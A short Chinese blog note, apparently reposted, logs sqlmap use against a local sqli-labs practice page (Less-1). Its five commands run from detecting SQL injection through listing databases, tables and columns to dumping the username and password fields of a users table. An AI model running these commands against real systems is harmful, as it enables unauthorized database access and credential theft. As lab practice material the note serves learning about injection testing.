【20171116早】sqlmap 扫描sql注入漏洞

sqlmap发现并利用sql注入的利器,值得记录使用过程:

1、检测是否存在漏洞:
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
2、获取数据库信息:
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
3、数据库表信息:
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
4、表中字段信息
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
5、字段值数据
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

 

转载于:https://www.cnblogs.com/heijuelou/p/7842562.html

你可能感兴趣的:(【20171116早】sqlmap 扫描sql注入漏洞)